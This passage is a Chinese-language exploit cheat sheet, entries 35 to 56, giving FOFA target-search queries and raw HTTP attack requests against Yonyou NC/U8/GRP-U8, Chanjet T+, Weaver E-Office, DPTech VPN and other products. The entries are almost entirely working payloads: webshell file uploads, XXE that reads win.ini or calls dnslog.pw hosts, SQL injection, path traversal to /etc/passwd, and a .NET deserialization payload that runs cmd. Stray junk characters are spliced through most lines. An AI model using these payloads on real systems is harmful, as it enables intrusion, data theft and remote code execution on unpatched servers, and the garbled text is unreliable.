2 t% }! ?" E* @0 }6 O4 S7 I$ Y/ R: y5 q% {2 B( c/ Z" Z+ c! l
35. 用友NC-Cloud importhttpscer任意文件上传
! W1 \8 i- j- ^/ j4 n" c& m5 @5 m4 BFOFA:app="用友-NC-Cloud"
" f2 R6 P& h! a" `" aPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1& T+ D3 ~* _+ t9 B. w
Host: 203.25.218.166:8888
3 S" p& n& j& \+ f) x& M8 GUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+ q0 t( L2 W' Q) q" L- b- {' dAccept-Encoding: gzip, deflate
" }- J$ g& k, P# u5 w+ o8 fAccept: */*& \8 J l: \% k2 ]' E
Connection: close
+ e9 b2 L, }0 s4 z3 c p0 K; D2 uaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
" H5 q% ?9 I3 [9 s) n2 T% TContent-Length: 190
# y8 a @& o' V! S+ i1 rContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df09 t, p$ ^# x/ Z' w" o2 X7 N$ u
* A2 l( x' ?: ?0 @! g4 j
--fd28cb44e829ed1c197ec3bc71748df0
; j/ Q% g, Z8 Z! |Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
5 Q, T4 v) o1 ~" n8 Y2 |9 t. T' h* e: k
<%out.println(1111*1111);%>
7 d7 T+ W# |: Y' W--fd28cb44e829ed1c197ec3bc71748df0--) q: ?3 j2 B3 b9 |( g- t G, X
( @! _: t# _. V* ?* U% P
& f0 X) k% |; |! `36. 用友NC-Cloud soapFormat XXE( e, R. `7 N/ S9 F, ]5 D( R
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 z" j8 m+ r e
POST /uapws/soapFormat.ajax HTTP/1.1
* ^) r% c. J& J: C( }4 sHost: 192.168.40.130:89891 m6 U( u5 }/ ]! V- i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.09 N9 B& L( j4 W' }: B$ I) x
Content-Length: 263
. L) k4 N3 {0 b/ X. t0 q( }* WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& L2 I7 K% H- P+ E
Accept-Encoding: gzip, deflate4 X! K/ g0 {5 P6 r+ C7 o3 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 f) z2 `4 a6 D- `/ f" |3 P( `$ tConnection: close$ ^) d5 @- @5 ~% d5 ^, G/ f
Content-Type: application/x-www-form-urlencoded
i9 l' M# [/ Z" B* ?0 }( ^' KUpgrade-Insecure-Requests: 1
, z. C) q+ A$ B7 K G6 E1 ?
2 Z* K; W/ j4 M$ Umsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a9 J# y/ e7 h$ c( a+ M
: L* P( j, {8 K8 ]8 t' B# p3 J6 T9 k& F7 p2 Y4 W% U* k6 Q. I
37. 用友NC-Cloud IUpdateService XXE
* U9 M9 U" J) d9 P( R eFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 N2 f2 `: z' RPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
8 @& l; k; R" b" c: F9 i- W5 u: RHost: 192.168.40.130:8989; m: }- `' P \* w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 W: N0 k& `; H! ?4 T
Content-Length: 4211 x1 b0 ^0 T4 v7 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9! G& B; Q5 Q& u! J- Y: l ^- X
Accept-Encoding: gzip, deflate
J8 {( @$ B8 z) SAccept-Language: zh-CN,zh;q=0.9
/ ^7 t0 J% O& q; W& u N x8 vConnection: close
& D" `8 M0 Z, \8 |. ]# @" sContent-Type: text/xml;charset=UTF-8
3 }3 V2 G9 S0 {* E* sSOAPAction: urn:getResult( I1 ?; X9 k" O+ D4 ~2 d( t; ~8 Z
Upgrade-Insecure-Requests: 1( {* N- ^; _9 J: H- m- x
/ ?' G/ {+ r5 `& s% L2 o<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
' c' j7 K; w+ ]. }; M0 h9 ?<soapenv:Header/>
+ S0 K2 W% d& ~5 y# v+ |5 p<soapenv:Body>6 w2 p' @8 O" T8 y- _! N
<iup:getResult>
- m0 A; x9 S8 v i. b% I6 L2 [<!--type: string-->
/ M5 s5 ^4 Z) d- g9 F<iup:string><![CDATA[7 Z$ H% q0 C- ^4 B( G* u
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
" y4 T* ~+ {/ e, O<xxx/>]]></iup:string> Q& h9 g1 M) W$ ~' G8 G0 t
</iup:getResult>) s, v# L4 |- M3 B5 K! N
</soapenv:Body>
3 w n& W; n8 _; p; F8 u</soapenv:Envelope>. C1 U3 G( _, d7 T5 k
4 b9 \2 D" D3 c W& R9 R; r
: }3 T' t# m4 ~) b
" j* u/ \, f/ m2 K- d0 x ~38. 用友U8 Cloud smartweb2.RPC.d XXE" I8 C% x+ _; P3 K
FOFA:app="用友-U8-Cloud"
; b& Q- z6 z$ i9 s: oPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 D4 y- o( N2 }
Host: 192.168.40.131:80888 j, n- ^ A+ u2 X q4 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* V% T) Y! U$ U$ E, r ^
Content-Length: 260" o- C0 O0 V5 W: \6 O% C. L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
' ?- S% y' v2 ?/ ]& ZAccept-Encoding: gzip, deflate' b; \: j, V4 F) c
Accept-Language: zh-CN,zh;q=0.9
2 ]! Z' k" V6 D# x. SConnection: close
4 ~+ @3 z Y( j5 ^- yContent-Type: application/x-www-form-urlencoded" w8 e I3 Y$ L& R l
$ Q$ M `$ i5 d/ H( [- m__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
- h6 p/ s. Q p* u6 a6 E. O
0 R6 h- P" W" Q1 o( h. i& I) }6 P& \# @2 o
39. 用友U8 Cloud RegisterServlet SQL注入
9 N. ^( g' d" P! W. f6 aFOFA:title="u8c"
1 s2 n4 D$ t P1 W b: n6 q. SPOST /servlet/RegisterServlet HTTP/1.1; M# s& |# y( y
Host: 192.168.86.128:8089
! x' S. b$ G# TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36: `3 o4 Y1 x. g) W
Connection: close
" A- i& H' r1 F- }Content-Length: 85
@8 { \' I6 H! V1 hAccept: */*
7 [7 o; o, @) n& UAccept-Language: en* j3 J8 y7 K0 v3 C
Content-Type: application/x-www-form-urlencoded, J: t' Q# |" W
X-Forwarded-For: 127.0.0.1+ e8 I4 z5 p5 i, [0 ~5 d
Accept-Encoding: gzip1 D0 S2 ]) J5 i ?
6 [3 G& c8 o4 A* F dusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--6 W* ^0 l: \# `# }8 G4 f( w) g( G4 r
. J% `$ X4 Y) Y" _6 C- e
/ C1 u4 N7 x8 J/ e- j1 j, b40. 用友U8-Cloud XChangeServlet XXE( }: \3 s8 \; ^4 I
FOFA:app="用友-U8-Cloud"
' w2 l* o5 C, }' k: Z- {/ RPOST /service/XChangeServlet HTTP/1.1. b$ q/ _# g; s9 o+ }/ k# ~) N9 s
Host: x.x.x.x
7 }" ?1 p# l4 W3 f, DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ D) |4 V' b- p" y8 B) qContent-Type: text/xml
6 V) S/ i7 M( Q; F% SConnection: close
' T# l5 g# l5 C8 v' {7 j( i: A" K& t8 ~9 q" v9 t. x* j
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>+ z: k0 F% p, p/ n$ z
6 [* ?8 f; x% H8 _
, r' T3 h! E1 R) @# D$ B: _) k. N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
# ]: X% ^3 J c7 kFOFA:app="用友-U8-Cloud"
0 J, }) [" }! v; V1 R) Q9 NGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
; y; k- v3 g: \ j) x/ y4 eHost:1 x, s* [5 f0 v3 O d' x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 [" X) @8 T+ ^& E1 qContent-Type: application/json) d0 w- N6 @6 R$ j+ }
Accept-Encoding: gzip
$ W$ G" w) [9 H( xConnection: close( V( n- @8 z; Y8 a
7 u8 E. C' g4 t4 z* |' y! i6 w
, _2 V- e( T, @$ j4 R8 c" B2 \42. 用友GRP-U8 SmartUpload01 文件上传. G' X8 _6 j+ t( c0 A
FOFA:app="用友-GRP-U8"- ^. o. V8 v5 o2 S
POST /u8qx/SmartUpload01.jsp HTTP/1.1
' F% d/ T' f E& W5 zHost: x.x.x.x
5 z; g! G; v. X5 ]- F* x6 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
) V6 e0 H" B& g- w. }3 b5 C0 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* k w- t. ], g; d# z, J9 Y8 h7 k! ]6 b. ]4 ^
PAYLOAD
. F% i7 S8 `* p6 `, h; _4 _
, I) D$ ^' t6 p7 u9 E4 n
: B# C) r* R& k0 \6 K3 v; F7 Vhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml/ u0 Y& q& x# L7 s
$ B, |1 |* Z- B) W* x43. 用友GRP-U8 userInfoWeb SQL注入致RCE- q& o0 T6 p/ d7 t
FOFA:app="用友-GRP-U8"0 \$ f0 A: M+ a, W" F4 Y
POST /services/userInfoWeb HTTP/1.1
, r& J6 m* s& x) N2 y, bHost: your-ip
; L) }( V& s A! z7 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' U% Z; `, r) G. q. A# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 i$ a/ }+ ^/ Q" I L
Accept-Encoding: gzip, deflate
3 s [# C) [) `5 |7 o: N a$ \9 }Accept-Language: zh-CN,zh;q=0.9* G; g8 X" T6 B2 U
Connection: close0 |+ V: E5 o1 u1 z1 A+ Z
SOAPAction:
# M" _" y' N0 LContent-Type: text/xml;charset=UTF-8
, u: H* ]) a1 Q& l
% B8 S' w* U6 a2 O<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">- j2 C+ x* y, G7 K" x% U+ ]. r. L
<soapenv:Header/>
" c" `) V$ Z1 X% D7 c+ }7 z <soapenv:Body>
" F7 o0 H5 N0 |, k% n <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
$ k; ~" V- i+ a+ [ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId># l5 R7 `3 E- o
</ser:getUserNameById>
7 c: Z) v/ p% o% \& B" v' v8 g </soapenv:Body>% M( ~6 K* R: c. |0 ~; |! r
</soapenv:Envelope>
" S% Z3 k. v. H, P* I6 [
' W4 K/ x' Q2 l' V$ I E. V% m- S
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. C9 {6 H0 X! V+ q. |FOFA:app="用友-GRP-U8"
+ s# z- ], X( Q- [& P. X! i6 K! @GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, C# I( x% g; D6 H
Host: your-ip5 d6 e2 u9 Q4 E3 y% _$ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
7 s9 R/ p$ W& j! h m7 V# q' ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* o0 r0 B8 ?. _) f% F2 ]7 h% f
Accept-Encoding: gzip, deflate% V# q- C- n" F- x
Accept-Language: zh-CN,zh;q=0.9
, X A* m% m6 n6 JConnection: close( b: p5 i$ E! f" [2 E
. G& ^% `% L' T: I! q4 l% q9 Y
45. 用友GRP-U8 ufgovbank XXE6 }# K; Q5 _# J( I
FOFA:app="用友-GRP-U8", v/ O' h" r2 }, r- T
POST /ufgovbank HTTP/1.17 Q2 H7 ~4 |7 w7 c- w+ p' f
Host: 192.168.40.130:2229 N* |6 K+ s5 b4 f% d; f4 D- c! k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
5 o6 e$ `" ~. s dConnection: close# D5 T# I2 ?1 q# B. D1 X
Content-Length: 161
5 ?1 _* C* V8 }" h. T& H2 G9 A6 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- L3 g" W: B% B: E& mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ E) K, V. \7 k6 {4 m" C
Content-Type: application/x-www-form-urlencoded p: z7 B$ }% n& ]& j8 a4 [6 G
Accept-Encoding: gzip- k5 M6 K% e" a& }) J5 ]# o) Y
+ B" h5 B v3 t \6 j* N) rreqData=<?xml version="1.0"?>
+ n8 _3 Z* J; I2 {: g* q<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
( O* h Q2 \# d; y! b- \) s1 Y4 [# @
4 y3 a2 k4 @! g2 H46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 A" e3 L9 G ^9 Z7 d2 bFOFA:app="用友-GRP-U8"
8 h, f( H' y. j/ L4 j8 b PGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.16 b" ~: ~7 H2 q8 ~
Host: your-ip
- b* |! X8 c/ M. Y8 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36) ?: F. I, e! |& J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: [6 z# ]- A8 q9 k& [
Accept-Encoding: gzip, deflate9 B8 L7 q9 G, ~3 C( y
Accept-Language: zh-CN,zh;q=0.9
% e( ~8 R5 g1 T2 X; ]Connection: close+ O/ V2 Z4 i0 a( ?' r, J
; I! J% b p5 L# [
0 Z2 j/ y w: K! ?8 g9 S- x! e; q! J47. 用友GRP A++Cloud 政府财务云 任意文件读取
- ?9 O' @+ {. I! k1 mFOFA:body="/pf/portal/login/css/fonts/style.css"
6 c1 q1 j1 R8 n" x& aGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
% V7 W3 L; x6 K6 g! aHost: x.x.x.x
% k) j+ |/ G4 r/ V/ hCache-Control: max-age=0
{8 Y! o* `" ?/ k, ^ dUpgrade-Insecure-Requests: 1) ]8 J4 W. C7 @2 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; r9 G/ W/ c' _7 L6 U. N" {# `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 Q" `3 h! E6 Z# |& P
Accept-Encoding: gzip, deflate, br& V" v% S4 W5 _! e$ E
Accept-Language: zh-CN,zh;q=0.9$ j5 n/ C$ O, K& _; B
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT) Z5 ^: L; G* B" N* g
Connection: close
* R9 H. o$ G/ H$ Z# q! T, U
, i- F C% V9 Y' c# S+ ~' D; b+ S3 j! P; c' d2 Q# U
8 j& Q: `5 R# E+ ]: A9 }( H48. 用友U8 CRM swfupload 任意文件上传
2 t% Y$ Q6 q QFOFA:title="用友U8CRM"- b% e8 ?/ ?$ \3 V
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.17 _. W5 A; o/ l
Host: your-ip
3 M% t2 N! g" J" s, lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ n7 Z& b q, p% W( B' BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! s+ g3 t6 p+ c0 q1 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 m3 @+ w' b& F7 D) D
Accept-Encoding: gzip, deflate+ B- j+ ~ e+ I; J2 |4 F% q
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668554 n6 L' M& T4 t, O1 o4 S5 k8 d* e
------269520967239406871642430066855
8 e$ s. |- x7 s6 DContent-Disposition: form-data; name="file"; filename="s.php": s2 f0 J6 w \# i7 o F
1231( W. m* L! @# }- V" y8 f7 u4 M
Content-Type: application/octet-stream- x9 ~ u0 f1 ]* X0 q7 w0 w u
------269520967239406871642430066855
# A7 ^& {; Q% i% p1 e8 l ?! v1 ?: V* ]Content-Disposition: form-data; name="upload"+ r ~ o" Y" p/ [
upload
7 G, o, A! [- O. s& V; o& E------269520967239406871642430066855--
0 s# R( n9 i3 v% C( h- U! v( T7 j7 T1 S; f: w
( O# F8 I1 B `. l
49. 用友U8 CRM系统uploadfile.php接口任意文件上传9 E# e- M; R. N' \& ^
FOFA:body="用友U8CRM"5 R6 f, z$ @0 n6 l- v4 A
" W' @( S% c1 {3 I! y& BPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.12 o2 m* n& Y6 J# K
Host: x.x.x.x. S* o! J. d" ]* _# u( D s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) J) Q0 Z! I& C: l* ^
Content-Length: 329. B& @6 s9 N( @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( b& m. E) e1 m& a: H* ?7 ] _
Accept-Encoding: gzip, deflate+ `7 o( x s5 y1 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( {$ g1 ^! A! s2 d9 T3 A
Connection: close) r/ h# `# t/ d9 j2 ?
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
( \8 U" I( ~6 e0 N" W
1 g! l9 v, p9 E* C+ h-----------------------------vvv3wdayqv3yppdxvn3w
6 I. b# o: w) Y& L) s0 z( x/ j( ?" R, ^Content-Disposition: form-data; name="file"; filename="%s.php "% L& L8 S" N' v) M& [4 b
Content-Type: application/octet-stream
0 O! F+ n6 I: U( s. _7 Q) P
6 W( m/ |1 w9 b# g+ j& Xwersqqmlumloqa/ p: K7 W2 q: j% O& J
-----------------------------vvv3wdayqv3yppdxvn3w* M F. C3 b& l% U7 `$ L4 ?
Content-Disposition: form-data; name="upload"
% V3 K, n& m1 I" ~
7 S# S6 ?# |" B+ Y3 v* Nupload& N/ @7 @$ E; |3 X9 d
-----------------------------vvv3wdayqv3yppdxvn3w--
6 G0 K8 m9 `4 g$ O: F# d
" J! K8 W4 Q" C! u9 ^1 q; ^/ u# A t7 E$ F
http://x.x.x.x/tmpfile/updB3CB.tmp.php
7 l7 h0 T$ l w0 K( |
& `# N4 k7 I! y: D7 s" t F50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 T. i" l: O- e; s6 ]4 U* mFOFA:body="close closebtnmodal"7 f# d, B- `' r. l
POST /course/filterRecords/ HTTP/1.1
* q* [5 j5 I4 e4 }Host: x.x.x.x& ?. d# C7 s/ F; j7 s& r& l# \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 G. ^ |& n# A4 j1 L) g4 b1 S1 tConnection: close6 K( [% `+ V9 T6 c0 N* ^' a
Content-Length: 224
% [, _. g( I# OAccept: */*9 z! _( G8 C/ M/ _ C6 e9 \. u1 W
Accept-Language: en2 r# C# U0 y7 q8 l
Content-Type: application/x-www-form-urlencoded
d7 q5 d, b" ]& t3 E7 V& \Accept-Encoding: gzip; V( K7 @ h; G0 F) A
% u9 C- t. b0 w! T, ysearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
" `8 ]% X; m- `: X- E8 Z- ^. `' U3 [4 A
. F+ d# e6 i9 c
0 i: X: T; }0 z51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 Y; d4 h8 t+ |, v1 [3 ^5 |& q6 j
FOFA:app="云时空社会化商业ERP系统"8 Y' |9 s p8 ~: L5 z. \
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.16 p1 `; @3 T2 m- [4 k/ X
Host: your-ip
# S! ]& X: {- r+ A9 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
" [& m6 L+ k/ W% ]* J0 o* ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- l' D+ s8 X8 e! }1 Z$ }5 ?
Accept-Encoding: gzip, deflate ^/ k: {- p2 r$ Z+ h0 j& @% N$ f
Accept-Language: zh-CN,zh;q=0.9
) v9 w$ C$ L! L2 b9 XConnection: close
" @# o. l" l! x; A1 u4 L4 }# [2 w! S' G( g' T
" p/ y# \4 \; }# T
52. 泛微E-Office json_common.php sql注入
' z3 f2 V* i8 W, G5 TFOFA:app="泛微-EOffice"
- ]1 e* z% B& ePOST /building/json_common.php HTTP/1.1: |9 n5 z6 ~$ J! r
Host: 192.168.86.128:8097
' F N4 f) ~) V: P; ~9 lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 F/ l7 g3 K* O
Connection: close3 g4 D7 s* C, P. A: w6 h/ `! s
Content-Length: 87
$ g. ^+ w" d A9 Z+ DAccept: */*
! g9 B3 S1 S( C* I: WAccept-Language: en* ~& M- D& T4 j+ c9 h8 t/ Z
Content-Type: application/x-www-form-urlencoded
: v- s4 i6 U! ~+ _Accept-Encoding: gzip
; a2 x0 d2 |3 N5 t4 u9 B
: h; Q s* _0 j- [9 f5 s5 z+ utfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
# Q9 }* ^+ F Q
6 Q+ E+ r7 Z& z$ X
% o% J7 u3 n |8 i) c3 A1 k! c9 r6 ~53. 迪普 DPTech VPN Service 任意文件上传
* Q- n# r& B/ P# g+ bFOFA:app="DPtech-SSLVPN"
: ~6 X. N! y3 r& t/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd. ?/ E0 x# m: `: D N4 R
' i0 z. E( M) f4 b# M9 w$ W
& d3 @0 M3 l! @9 h7 c2 @ p54. 畅捷通T+ getstorewarehousebystore 远程代码执行4 \ f# v1 f0 a6 @4 r- `
FOFA:app="畅捷通-TPlus"0 v! q3 ?/ C3 I0 I
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% i5 m+ S) o5 d7 a; h7 h5 v. O# ^"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
6 J3 h! c6 p( W# c0 S3 O9 ?0 O0 I1 f: D" k2 a: A5 x
/ a a: G2 b. D, H+ \/ T% L, Q& m完整数据包
I& T+ w' O3 LPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1% U5 c6 M: k4 J2 O' \
Host: x.x.x.x
' S4 l% O4 }& {' x9 E* _User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
6 ]$ m+ t3 P3 \ WContent-Length: 593
: g4 h% s6 T G: _6 O/ t! Y6 J% Z/ _+ n$ j& B
{
a) H. ~- p5 N9 ^2 ^& C# Q"storeID":{+ o% y _- _+ _
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 t/ g; Z, r* M& b5 @
"MethodName":"Start",% O5 C# O& m2 a b4 W% O/ `
"ObjectInstance":{
8 o2 _6 i9 m: x8 J6 { "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, r& @7 q" ~- i) B& q9 \ "StartInfo":{
( l+ \ v& [& a$ z' | "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 o+ f Q U( U0 W "FileName":"cmd",
4 b: `) f+ M, n+ m. M; [% ] "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"! i4 A8 F% |% q0 U5 U' q, k3 w
}; e' Y5 i# J1 r
}8 E& W( s# U e. O( {7 H6 |1 r; \
}, q' l: O( ? i" T" v
}
( _' }% W. N5 r. o, E2 t) ^
) `0 p0 ]3 M0 C1 h2 y6 R; B( t, a. I3 G2 d! ?9 J
第二步,访问如下url8 T/ ?+ u! R: a1 D$ z4 v
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' }) E( y' u2 ]8 Q2 K$ ^9 [& N6 Z6 G
: h+ v2 i' d( j0 D* W7 ]# H z* M; k/ d
/ U- ~0 w2 w4 x5 u+ Q; @55. 畅捷通T+ getdecallusers信息泄露
1 _& ~0 [$ g5 H; E3 v7 r, ?FOFA:app="畅捷通-TPlus"
$ q. f% y# ^; z, u第一步,通过2 P! A4 Q9 C" F q; r D5 x. E
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
N) F8 F* Z, _3 ^. V7 W$ O第二步,利用获取到的Cookie请求; `4 k- ]$ m Z, C" D1 F7 J
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
- t" Z5 ?4 p' Z5 v2 ~5 k! s [
4 ]" w, V- Q( H* _56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ B; g. k* _+ F( p
FOFA: app="畅捷通-TPlus"
. r" |$ O7 L" L& pPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1- m' t6 H4 L5 r% y/ B
Host: x.x.x.x5 Z9 W$ d0 @2 G/ r' _- L: C
